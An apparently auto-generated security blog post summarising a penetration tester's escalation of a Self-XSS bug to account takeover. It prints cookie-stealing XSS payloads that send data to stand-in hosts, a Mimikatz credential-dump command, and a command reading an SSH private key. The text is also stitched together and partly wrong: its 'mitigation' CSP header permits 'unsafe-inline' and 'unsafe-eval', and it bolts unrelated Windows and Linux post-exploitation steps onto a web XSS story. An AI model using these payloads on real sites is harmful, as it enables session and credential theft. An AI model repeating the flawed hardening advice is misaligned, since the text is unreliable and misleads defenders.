From Self-XSS to Full Account Takeover: A Penetration Tester’s Journey

By /

Listen to this Post

Amr Mustafa, a Penetration Tester at Bugswagger and Bug Hunter at HackerOne, recently shared his experience uncovering a critical vulnerability. Starting from a Self-XSS flaw, he escalated it to a full Account Takeover (ATO) after 30 hours of intensive work. A detailed write-up is expected soon.

You Should Know:

1. Understanding Self-XSS

Self-XSS (Cross-Site Scripting) is a client-side vulnerability where malicious JavaScript executes only if the victim pastes it into their browser console. Attackers often use social engineering to trick users into running the payload.

Example Payload:

alert(document.cookie); // Basic XSS test

2. Escalating to Stored XSS

If the application reflects user input unsafely, Self-XSS can sometimes be converted into Stored XSS: 

<script>fetch('https://attacker.com/steal?cookie='+document.cookie);</script>

3. Exploiting XSS for Account Takeover

Once XSS is confirmed, attackers can:

  • Steal session cookies.
  • Perform CSRF attacks.
  • Modify account settings (email/password).

Cookie Theft via XSS:

var img = new Image();
img.src = 'http://evil.com/log?cookie=' + encodeURIComponent(document.cookie);

4. Mitigation Techniques

  • Implement Content Security Policy (CSP) headers: 
    Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval'
  • Use HttpOnly and Secure flags for cookies.
  • Sanitize user input with libraries like DOMPurify.

5. Post-Exploitation: Lateral Movement

If an ATO is successful, attackers may:

  • Use Mimikatz (Windows) to extract credentials: 
    Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
  • Check for SSH keys (Linux): 
    cat ~/.ssh/id_rsa

What Undercode Say:

Escalating from Self-XSS to ATO requires persistence and creativity. Always test for:
– DOM-based vulnerabilities (eval(), innerHTML).
– Insecure API endpoints that accept malicious input.
– Weak session management (e.g., non-rotating tokens).

Key Commands for Bug Hunters:

  • Linux: 
    grep -r "document.cookie" /var/www/html  Find JS cookie handling
  • Windows: 
    Get-ChildItem -Path C:\inetpub\wwwroot -Recurse -Include .js | Select-String "innerHTML"

Expected Output:

A full technical write-up from Amr Mustafa, detailing:

1. Initial Self-XSS discovery.

2. Exploitation path to ATO.

3. Vendor response and patch timeline.

4. Lessons learned for defensive hardening.

(Stay tuned for the full report!)

References:

Reported By: Amr Mustafa11 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: